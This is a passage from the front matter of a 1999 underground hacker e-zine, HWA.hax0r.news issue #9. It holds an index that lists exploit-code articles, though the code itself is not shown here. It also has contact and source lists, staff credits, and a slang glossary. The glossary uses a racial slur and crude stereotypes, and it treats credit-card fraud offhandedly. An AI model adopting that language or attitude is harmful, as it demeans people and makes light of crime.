home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / HWA-hn9.txt < prev    next >
Encoding:
Text File  |  1999-03-24  |  212.6 KB  |  5,047 lines

  1.     [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  2.   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  3.   ==========================================================================
  4.   =                       <=-[ HWA.hax0r.news ]-=>                         =
  5.   ==========================================================================
  6.     [=HWA'99=]                         Number 9 Volume 1 1999 March 13th 99
  7.   ==========================================================================
  8.  
  9.  
  10.   Are you running WindowsNT and still under the illusion that it is secure?
  11.                 
  12.                 
  13.  ``A couple of freelance writers are working on a story for us about
  14.    security auditing and protection. As part of their "research," they 
  15.    decided to see if they  could hack into one of our lab networks. It 
  16.    took them only a few hours to successfully break into our Windows NT
  17.    boxes. And from there, they learned the configuration of our lab 
  18.    networks, the server names and functions, the operating systems we
  19.    run and most of the passwords on the key accounts on our Microsoft
  20.    Windows NT, Novell NetWare and Unix servers, as well as a good many
  21.    of our routers and switches.'' 
  22.                          
  23.                          - From NetworkWeek, Story in section 10.0
  24.  
  25.  
  26.  
  27.  
  28.    Synopsis
  29.    --------
  30.  
  31.    The purpose of this newsletter is to 'digest' current events of interest
  32.    that affect the online underground and netizens in general. This includes
  33.    coverage of general security issues, hacks, exploits, underground news
  34.    and anything else I think is worthy of a look see.
  35.  
  36.     This list is NOT meant as a replacement for, nor to compete with, the
  37.    likes of publications such as CuD or PHRACK or with news sites such as
  38.    AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  39.    BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  40.  
  41.     It *is* intended  however, to  compliment such material and provide a
  42.    reference to those who follow the culture by keeping tabs on as many
  43.    sources as possible and providing links to further info, its a labour
  44.    of love and will be continued for as long as I feel like it, i'm not
  45.    motivated by dollars or the illusion of fame, did you ever notice how
  46.    the most famous/infamous hackers are the ones that get caught? there's
  47.    a lot to be said for remaining just outside the circle... <g>
  48.  
  49.  
  50.    @HWA
  51.  
  52.    =-----------------------------------------------------------------------=
  53.  
  54.                      Welcome to HWA.hax0r.news ... #9
  55.  
  56.    =-----------------------------------------------------------------------=
  57.  
  58.           "I'm doing the BEST I can so don't give me any SHIT"
  59.  
  60.                                     - Seen on a button worn by `Ed'..
  61.  
  62.  
  63.     *******************************************************************
  64.     ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  65.     ***                                                             ***
  66.     *** please join to discuss or impart news on techno/phac scene  ***
  67.     *** stuff or just to hang out ... someone is usually around 24/7***
  68.     *******************************************************************
  69.  
  70.  
  71.   =-------------------------------------------------------------------------=
  72.  
  73.   Issue #9                                       Empirical knowledge is power
  74.  
  75.  
  76.   =--------------------------------------------------------------------------=
  77.  
  78.   inet.d THIS b1lly the llammah
  79.  
  80.   ________ ------- ___________________________________________________________
  81.  |\____\_/[ INDEX ]__________________________________________________________/|
  82.  | |                                                                         ||
  83.  | | Key     Content                                                         ||
  84.   \|_________________________________________________________________________/
  85.  
  86.     00.0  .. COPYRIGHTS
  87.     00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
  88.     00.2  .. SOURCES
  89.     00.3  .. THIS IS WHO WE ARE
  90.     00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
  91.     00.5  .. THE HWA_FAQ V1.0
  92.  
  93.    \__________________________________________________________________________/
  94.  
  95.     01.0  .. Greets
  96.     01.1  .. Last minute stuff, rumours, newsbytes
  97.     01.2  .. Mailbag
  98.     02.0  .. From the editor
  99.     02.1  .. Demoniz trashcans his webboard
  100.     03.0  .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse
  101.     03.1  .. The FPSC-IRCD.txt advisory.  
  102.     04.0  .. Pentagon under attack (again)
  103.     04.1  .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
  104.     04.2  .. New Backdoor found: Default passwords in Bay networks switches
  105.     04.3  .. ISAPI exploit code 
  106.     04.4  .. Winfreez.c new exploit code for win9x and NT
  107.     04.5  .. Unknown Zone: Windows intra/inter net zone difficulties
  108.     04.6  .. Sniffing out MS Security glitch
  109.     05.0  .. Linux TCP flaw exploit code for Linux 2.0.35 and older.
  110.              (includes Solaris version)            
  111.     06.0  .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit
  112.     07.0  .. New Computer Technology Makes Hacking a Snap - Washington Post
  113.     08.0  .. Korean "Superhacker" a national resource...
  114.     09.0  .. The l0pht and NFR team up to produce top flight IDS
  115.     10.0  .. A good example of how 'Secure' NT really is
  116.     11.0  .. CON: The Black Hat Briefings Security Conference
  117.     12.0  .. CON: CQRE [Secure] Congress and Exhibition
  118.     13.0  .. CON: can't afford $2k? check out Canc0n99 security Conference
  119.     14.0  .. CON: Countering cyberterrorism
  120.     
  121.     AD.S  .. Post your site ads or etc here, if you can offer something in return
  122.              thats tres cool, if not we'll consider ur ad anyways so send it in.
  123.  
  124.      H.W  .. Hacked Websites  
  125.      A.0  .. APPENDICES
  126.      A.1  .. PHACVW linx and references
  127.   ____________________________________________________________________________
  128.  |\__________________________________________________________________________/|
  129.  | |                                                                         ||
  130.  | |                                                                         ||
  131.   \|_________________________________________________________________________|/
  132.  
  133.  
  134.      
  135.      @HWA'99
  136.  
  137.  
  138.  
  139.  
  140.   00.0  (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
  141.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  142.  
  143.      THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
  144.      OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
  145.      WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
  146.      (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
  147.      READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
  148.  
  149.      Important semi-legalese and license to redistribute:
  150.  
  151.      YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
  152.      AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
  153.      ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
  154.      IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
  155.      APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
  156.      IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
  157.      ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
  158.      ME PRIVATELY current email cruciphux@dok.org
  159.  
  160.      THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
  161.      WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
  162.      THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
  163.  
  164.      I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
  165.      AND REDISTRIBUTE/MIRROR. - EoD
  166.  
  167.  
  168.      Although this file and all future issues are now copyright, some of
  169.     the content holds its  own copyright and these are printed and
  170.     respected. News is news so i'll print any and all news but will quote
  171.     sources when the source is known, if its good enough for CNN its good
  172.     enough for me. And i'm doing it for free on my own time so pfffft. :)
  173.  
  174.     No monies are made or sought through the distribution of this material.
  175.     If you have a problem or concern email me and we'll discuss it.
  176.  
  177.     cruciphux@dok.org
  178.  
  179.     Cruciphux [C*:.]
  180.  
  181.  
  182.  
  183.   00.1  CONTACT INFORMATION AND MAIL DROP
  184.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  185.  
  186.        Has it occurred to anybody that "AOL for Dummies" is an extremely
  187.        redundant name for a book?
  188.                                       - unknown
  189.  
  190.  
  191.      Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
  192.     Canada / North America (hell even if you are inside ..) and wish to
  193.     send printed matter like newspaper clippings a subscription to your
  194.     cool foreign hacking zine or photos, small non-explosive packages
  195.     or sensitive information etc etc well, now you can. (w00t) please
  196.     no more inflatable sheep or plastic dog droppings, or fake vomit
  197.     thanks.
  198.  
  199.     Send all goodies to:
  200.  
  201.         HWA NEWS
  202.         P.O BOX 44118
  203.         370 MAIN ST. NORTH
  204.         BRAMPTON, ONTARIO
  205.         CANADA
  206.         L6V 4H5
  207.  
  208.     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
  209.     ~~~~~~~  reading this from some interesting places, make my day and get a
  210.              mention in the zine, send in a postcard, I realize that some places
  211.              it is cost prohibitive but if you have the time and money be a cool
  212.              dude / gal and send a poor guy a postcard preferably one that has some
  213.              scenery from your place of residence for my collection, I collect stamps
  214.              too so you kill two birds with one stone by being cool and mailing in a
  215.              postcard, return address not necessary, just a  "hey guys being cool in
  216.              Bahrain, take it easy" will do ... ;-) thanx.
  217.  
  218.  
  219.  
  220.     Ideas for interesting 'stuff' to send in apart from news:
  221.  
  222.     - Photo copies of old system manual front pages (optionally signed by you) ;-)
  223.     - Photos of yourself, your mom, sister, dog and or cat in a NON
  224.       compromising position plz I don't want pr0n. <g>
  225.     - Picture postcards
  226.     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  227.       tapes with hack/security related archives, logs, irc logs etc on em.
  228.     - audio or video cassettes of yourself/others etc of interesting phone
  229.       fun or social engineering examples or transcripts thereof.
  230.  
  231.     If you still can't think of anything you're probably not that interesting
  232.     a person after all so don't worry about it <BeG>
  233.  
  234.     Our current email:
  235.  
  236.     Submissions/zine gossip.....: hwa@press.usmc.net
  237.     Private email to editor.....: cruciphux@dok.org
  238.     Distribution/Website........: sas72@usa.net
  239.  
  240.     @HWA
  241.  
  242.  
  243.  
  244.   00.2  Sources ***
  245.         ~~~~~~~~~~~
  246.  
  247.      Sources can be some, all, or none of the following (by no means complete
  248.     nor listed in any degree of importance) Unless otherwise noted, like msgs
  249.     from lists or news from other sites, articles and information is compiled
  250.     and or sourced by Cruciphux no copyright claimed.
  251.  
  252.     HiR:Hackers Information Report... http://axon.jccc.net/hir/
  253.     News & I/O zine ................. http://www.antionline.com/
  254.    *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!*
  255.     News (New site unconfirmed).......http://cnewz98.hypermart.net/
  256.     Back Orifice/cDc..................http://www.cultdeadcow.com/
  257.     News site (HNN) .....,............http://www.hackernews.com/
  258.     Help Net Security.................http://net-security.org/
  259.     News,Advisories,++ ...............http://www.l0pht.com/
  260.     NewsTrolls (HNN)..................http://www.newstrolls.com/
  261.     News + Exploit archive ...........http://www.rootshell.com/beta/news.html
  262.     CuD ..............................http://www.soci.niu.edu/~cudigest
  263.     News site+........................http://www.zdnet.com/
  264.  
  265.     +Various mailing lists and some newsgroups, such as ...
  266.     +other sites available on the HNN affiliates page, please see
  267.      http://www.hackernews.com/affiliates.html as they seem to be popping up
  268.      rather frequently ...
  269.  
  270.     * Yes demoniz is now officially retired, if you go to that site though the
  271.      Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
  272.      also be hosting a webboard as soon as that site comes online perhaps you can
  273.      visit it and check us out if I can get some decent wwwboard code running I
  274.      don't really want to write my own, another alternative being considered is a
  275.      telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux
  276.  
  277.     http://www.the-project.org/ .. IRC list/admin archives
  278.     http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
  279.  
  280.     alt.hackers.malicious
  281.     alt.hackers
  282.     alt.2600
  283.     BUGTRAQ
  284.     ISN security mailing list
  285.     ntbugtraq
  286.     <+others>
  287.  
  288.     NEWS Agencies, News search engines etc:
  289.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  290.     http://www.cnn.com/SEARCH/
  291.     http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
  292.     http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
  293.     http://www.ottawacitizen.com/business/
  294.     http://search.yahoo.com.sg/search/news_sg?p=cracker
  295.     http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
  296.     http://www.zdnet.com/zdtv/cybercrime/
  297.     http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
  298.  
  299.     NOTE: See appendices for details on other links.
  300.  
  301.  
  302.     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  303.     http://freespeech.org/eua/ Electronic Underground Affiliation
  304.     http://www.l0pht.com/cyberul.html
  305.     http://www.hackernews.com/archive.html?122998.html
  306.     http://ech0.cjb.net ech0 Security
  307.     http://net-security.org Net Security
  308.  
  309.     ...
  310.  
  311.  
  312.     Submissions/Hints/Tips/Etc
  313.     ~~~~~~~~~~~~~~~~~~~~~~~~~~
  314.  
  315.     All submissions that are `published' are printed with the credits
  316.     you provide, if no response is received by a week or two it is assumed
  317.     that you don't care wether the article/email is to be used in an issue
  318.     or not and may be used at my discretion.
  319.  
  320.     Looking for:
  321.  
  322.     Good news sites that are not already listed here OR on the HNN affiliates
  323.     page at http://www.hackernews.com/affiliates.html
  324.  
  325.     Magazines (complete or just the articles) of breaking sekurity or hacker
  326.     activity in your region, this includes telephone phraud and any other
  327.     technological use, abuse hole or cool thingy. ;-) cut em out and send it
  328.     to the drop box.
  329.  
  330.  
  331.     - Ed
  332.  
  333.     Mailing List Subscription Info   (Far from complete)         Feb 1999
  334.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~
  335.  
  336.     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
  337.  
  338.  
  339.     THE MOST READ:
  340.  
  341.     BUGTRAQ - Subscription info
  342.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  343.  
  344.     What is Bugtraq?
  345.  
  346.     Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  347.     file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
  348.     bugtraq, send mail to listserv@netspace.org containing the message body
  349.     subscribe bugtraq. I've been archiving this list on the web since late
  350.     1993. It is searchable with glimpse and archived on-the-fly with hypermail.
  351.  
  352.     Searchable Hypermail Index;
  353.  
  354.           http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
  355.  
  356.  
  357.  
  358.     About the Bugtraq mailing list
  359.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  360.  
  361.     The following comes from Bugtraq's info file:
  362.  
  363.     This list is for *detailed* discussion of UNIX security holes: what they are,
  364.     how to exploit, and what to do to fix them.
  365.  
  366.     This list is not intended to be about cracking systems or exploiting their
  367.     vulnerabilities. It is about defining, recognizing, and preventing use of
  368.     security holes and risks.
  369.  
  370.     Please refrain from posting one-line messages or messages that do not contain
  371.     any substance that can relate to this list`s charter.
  372.  
  373.     I will allow certain informational posts regarding updates to security tools,
  374.     documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
  375.     on this list.
  376.  
  377.     Please follow the below guidelines on what kind of information should be posted
  378.     to the Bugtraq list:
  379.  
  380.     + Information on Unix related security holes/backdoors (past and present)
  381.     + Exploit programs, scripts or detailed processes about the above
  382.     + Patches, workarounds, fixes
  383.     + Announcements, advisories or warnings
  384.     + Ideas, future plans or current works dealing with Unix security
  385.     + Information material regarding vendor contacts and procedures
  386.     + Individual experiences in dealing with above vendors or security organizations
  387.     + Incident advisories or informational reporting
  388.  
  389.     Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
  390.     reflector address if the response does not meet the above criteria.
  391.  
  392.     Remember: YOYOW.
  393.  
  394.     You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
  395.     those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
  396.  
  397.     For questions or comments, please mail me:
  398.     chasin@crimelab.com (Scott Chasin)
  399.  
  400.  
  401.     BEST-OF-SECURITY Subscription Info.
  402.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  403.  
  404.  
  405.                     _/_/_/          _/_/          _/_/_/
  406.                    _/    _/      _/    _/      _/
  407.                   _/_/_/        _/    _/        _/_/
  408.                  _/    _/      _/    _/            _/
  409.                 _/_/_/          _/_/        _/_/_/
  410.  
  411.                 Best            Of          Security
  412.  
  413.     "echo subscribe|mail best-of-security-request@suburbia.net"
  414.  
  415.                                 or
  416.  
  417.     "echo subscribe|mail best-of-security-request-d@suburbia.net"
  418.  
  419.                           (weekly digest)
  420.  
  421.     For those of you that just don't get the above, try sending a message to
  422.     best-of-security-request@suburbia.net with a subject and body of subscribe
  423.     and you will get added to the list (maybe, if the admin likes your email).
  424.  
  425.     Crypto-Gram
  426.     ~~~~~~~~~~~
  427.  
  428.        CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  429.       insights, and commentaries on cryptography and computer security.
  430.  
  431.       To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
  432.       blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe,
  433.       visit http://www.counterpane.com/unsubform.html.á Back issues are available
  434.       on http://www.counterpane.com.
  435.  
  436.        CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of
  437.       Counterpane Systems, the author of "Applied Cryptography," and an inventor
  438.       of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of
  439.       the International Association for Cryptologic Research, EPIC, and VTW.á He
  440.       is a frequent writer and lecturer on cryptography.
  441.  
  442.  
  443.     CUD Computer Underground Digest
  444.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  445.     This info directly from their latest ish:
  446.  
  447.     Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09
  448. ááááá
  449. ááááááááááááááááááááá ISSNá 1004-042X
  450.  
  451. áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
  452. áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
  453. áááááá Archivist: Brendan Kehoe
  454. áááááá Poof Reader:áá Etaion Shrdlu, Jr.
  455. áááááá Shadow-Archivists: Dan Carosone / Paul Southworth
  456. ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala
  457. ááááááááááááááááááááááááá Ian Dickinson
  458. áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
  459.  
  460.  
  461.  
  462.     [ISN] Security list
  463.     ~~~~~~~~~~~~~~~~~~~
  464.     This is a low volume list with lots of informative articles, if I had my
  465.     way i'd reproduce them ALL here, well almost all .... ;-) - Ed
  466.  
  467.  
  468.     Subscribe: mail majordomo@repsec.com with "subscribe isn".
  469.  
  470.  
  471.  
  472.     @HWA
  473.  
  474.  
  475.   00.3  THIS IS WHO WE ARE
  476.         ~~~~~~~~~~~~~~~~~~
  477.  
  478.       "If all it takes is a million monkeys banging on keyboards then how
  479.       come AOL hasn't turned out any Shakespeare yet??" - Anon.
  480.  
  481.       Some HWA members and Legacy staff
  482.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  483.       cruciphux@dok.org.........: currently active/editorial
  484.       darkshadez@ThePentagon.com: currently active/man in black
  485.       fprophet@dok.org..........: currently active/IRC+ man in black
  486.       sas72@usa.net ............. currently active/IRC+ distribution
  487.       vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  488.       dicentra...(email withheld): IRC+ grrl in black
  489.  
  490.  
  491.       Foreign Correspondants/affiliate members
  492.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  493.       ATTENTION: All foreign correspondants please check in or be removed by next
  494.       issue  I need  your current emails since contact info was recently lost in a
  495.       HD mishap and i'm not carrying any deadweight. Plus we need more people sending
  496.       in info, my apologies for not getting back to you if you sent in January I lost
  497.       it, please resend.
  498.  
  499.  
  500.  
  501.        N0Portz ..........................: Australia
  502.        Qubik ............................: United Kingdom
  503.        system error .....................: Indonesia
  504.        Wile (wile coyote) ...............: Japan/the East
  505.        Ruffneck  ........................: Netherlands/Holland
  506.  
  507.        And unofficially yet contributing too much to ignore ;)
  508.  
  509.        Spikeman .........................: World media
  510.  
  511.        Please send in your sites for inclusion here if you haven't already
  512.        also if you want your emails listed send me a note ... - Ed
  513.  
  514.       http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
  515.  
  516.  
  517.      Contributors to this issue:
  518.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  519.        Spikeman .........................: daily news updates+
  520.  
  521.        *******************************************************************
  522.        ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  523.        *******************************************************************
  524.  
  525.     :-p
  526.  
  527.  
  528.     1. We do NOT work for the government in any shape or form.Unless you count paying
  529.        taxes ... in which case we work for the gov't in a BIG WAY. :-/
  530.  
  531.     2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
  532.        events its a good idea to check out issue #1 at least and possibly also the
  533.        Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
  534.  
  535.  
  536.     @HWA
  537.  
  538.  
  539.  
  540.   00.4  Whats in a name? why HWA.hax0r.news??
  541.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  542.         
  543.         "When i'm 21 i'm going to change my name to 'Anonymous' and 
  544.          claim royalties for all the editorials written and attributed 
  545.          to my name." - Anonymous
  546.  
  547.       Well what does HWA stand for? never mind if you ever find out I may
  548.      have to get those hax0rs from 'Hackers' or the Pretorians after you.
  549.  
  550.      In case you couldn't figure it out hax0r is "new skewl" and although
  551.      it is laughed at, shunned, or even pidgeon holed with those 'dumb
  552.      leet (l33t?) dewds' <see article in issue #4> this is the state
  553.      of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
  554.      up  and comers, i'd highly recommend you get that book. Its almost
  555.      like  buying a clue. Anyway..on with the show .. - Editorial staff
  556.  
  557.  
  558.      @HWA
  559.  
  560.   00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
  561.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  562.  
  563.     Also released in issue #3. (revised) check that issue for the faq
  564.     it won't be reprinted unless changed in a big way with the exception
  565.     of the following excerpt from the FAQ, included to assist first time
  566.     readers:
  567.  
  568.     Some of the stuff related to personal useage and use in this zine are
  569.     listed below: Some are very useful, others attempt to deny the any possible
  570.     attempts at eschewing obfuscation by obsucuring their actual definitions.
  571.  
  572.     @HWA   - see EoA  ;-)
  573.  
  574.     !=     - Mathematical notation "is not equal to" or "does not equal"
  575.              ASC(247)  "wavey equals" sign means "almost equal" to. If written
  576.              an =/= (equals sign with a slash thru it) also means !=, =< is Equal
  577.              to or less than and =>  is equal to or greater than (etc, this aint
  578.              fucking grade school, cripes, don't believe I just typed all that..)
  579.  
  580.     AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
  581.  
  582.     AOL    - A great deal of people that got ripped off for net access by a huge
  583.              clueless isp with sekurity that you can drive buses through, we're
  584.              not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
  585.              least they could try leasing one??
  586.  
  587.    *CC     - 1 - Credit Card (as in phraud)
  588.              2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
  589.  
  590.     CCC    - Chaos Computer Club (Germany)
  591.  
  592.    *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
  593.              ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
  594.              watch videos and seminars, get drunk, listen to speakers, and last but
  595.              not least, get drunk.
  596.    *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
  597.                  speak he's the guy that breaks into systems and is often (but by no
  598.                  means always) a "script kiddie" see pheer
  599.               2 . An edible biscuit usually crappy tasting without a nice dip, I like
  600.                   jalapeno pepper dip or chives sour cream and onion, yum - Ed
  601.  
  602.     Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
  603.               Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
  604.               ebonics, speaking in a dark tongue ... being ereet, see pheer
  605.  
  606.     EoC    - End of Commentary
  607.  
  608.     EoA    - End of Article or more commonly @HWA
  609.  
  610.     EoF    - End of file
  611.  
  612.     EoD    - End of diatribe (AOL'ers: look it up)
  613.  
  614.     FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
  615.             usually in general media articles not high brow articles such as ours or other
  616.             HNN affiliates ;)
  617.  
  618.     du0d   - a small furry animal that scurries over keyboards causing people to type
  619.              wierd crap on irc, hence when someone says something stupid or off topic
  620.              'du0d wtf are you talkin about' may be used.
  621.  
  622.    *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
  623.  
  624.    *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
  625.             define, I think it is best defined as pop culture's view on The Hacker ala
  626.             movies such as well erhm "Hackers" and The Net etc... usually used by "real"
  627.             hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
  628.             some coffee?' or can you hax0r some bread on the way to the table please?'
  629.  
  630.             2 - A tool for cutting sheet metal.
  631.  
  632.     HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
  633.              time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
  634.              noun means the hackernews site proper. k? k. ;&
  635.  
  636.     HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
  637.  
  638.     J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d
  639.  
  640.     MFI/MOI- Missing on/from IRC
  641.  
  642.     NFC   - Depends on context: No Further Comment or No Fucking Comment
  643.  
  644.     NFR   - Network Flight Recorder (Do a websearch) see 0wn3d
  645.  
  646.     NFW   - No fuckin'way
  647.  
  648.    *0WN3D - You are cracked and owned by an elite entity see pheer
  649.    *OFCS  - Oh for christ's sakes
  650.  
  651.     PHACV - And variations of same <coff>
  652.             Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
  653.  
  654.           Alternates: H - hacking, hacktivist
  655.                       C - Cracking <software>
  656.                       C - Cracking <systems hacking>
  657.                       V - Virus
  658.                       W - Warfare <cyberwarfare usually as in Jihad>
  659.                      CT - Cyber Terrorism
  660.  
  661.    *PHEER -  This is what you do when an ereet or elite person is in your presence
  662.             see 0wn3d
  663.  
  664.    *RTFM  - Read the fucking manual - not always applicable since some manuals are
  665.             pure shit but if the answer you seek is indeed in the manual then you
  666.             should have RTFM you dumb ass.
  667.  
  668.     TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0
  669.  
  670.     TBA   - To Be Arranged/To Be Announced also 2ba
  671.  
  672.     TFS   - Tough fucking shit.
  673.  
  674.    *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
  675.             from the underground masses. also "w00ten" <sic>
  676.  
  677.             2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
  678.  
  679.     *wtf  - what the fuck
  680.  
  681.     *ZEN  - The state you reach when you *think* you know everything (but really don't)
  682.             usually shortly after reaching the ZEN like state something will break that
  683.             you just 'fixed' or tweaked.
  684.             
  685.      @HWA            
  686.      
  687.      
  688.                             -=-    :.    .:        -=-
  689.                             
  690.                             
  691.                             
  692.  
  693.   01.0  Greets!?!?! yeah greets! w0w huh. - Ed
  694.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  695.  
  696.      Thanks to all in the community for their support and interest but i'd
  697.      like to see more reader input, help me out here, whats good, what sucks
  698.      etc, not that I guarantee i'll take any notice mind you, but send in
  699.      your thoughts anyway.
  700.  
  701.  
  702.      Shouts to:
  703.  
  704.        * Kevin Mitnick       * demoniz          * The l0pht crew
  705.        * tattooman           * Dicentra         * Pyra
  706.        * Vexxation           * FProphet         * TwistedP
  707.        * NeMstah             * the readers      * mj
  708.        * Kokey               * ypwitch          * kimmie
  709.        * tsal                * spikeman         * YOU.
  710.  
  711.        * #leetchans ppl, you know who you are...
  712.  
  713.        * all the people who sent in cool emails and support
  714.        * our new 'staff' members.
  715.  
  716.  
  717.  
  718.      kewl sites:
  719.  
  720.      + http://www.freshmeat.net/
  721.      + http://www.slashdot.org/
  722.      + http://www.l0pht.com/
  723.      + http://www.2600.com/
  724.      + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/)
  725.      + http://www.legions.org/
  726.      + http://www.genocide2600.com/
  727.      + http://www.genocide2600.com/~spikeman/
  728.      + http://www.genocide2600.com/~tattooman/
  729.      + http://www.hackernews.com/ (Went online same time we started issue 1!)
  730.  
  731.      @HWA
  732.  
  733.  
  734.   01.1  Last minute stuff, rumours and newsbytes
  735.         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  736.  
  737.        "What is popular isn't always right, and what is right isn't
  738.          always popular..."
  739.                            - FProphet '99
  740.  
  741.     +++ When was the last time you backed up your important data?
  742.     
  743.      ++  BORED?
  744.          You may be interested in this...
  745.          http://www.patents.ibm.com/details?patent_number=5501650
  746.          if that isn't quite your erh speed, then you can always
  747.          check out http://www.hamsterdance.com/ for a laugh
  748.          I enjoyed it ...the graphics are most amusing.
  749.  
  750.      ++  SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO?
  751.          Contributed by FProphet source: Betanews.com
  752.         
  753.          And you thought it was just you. Betanews.com (www.betanews.com)
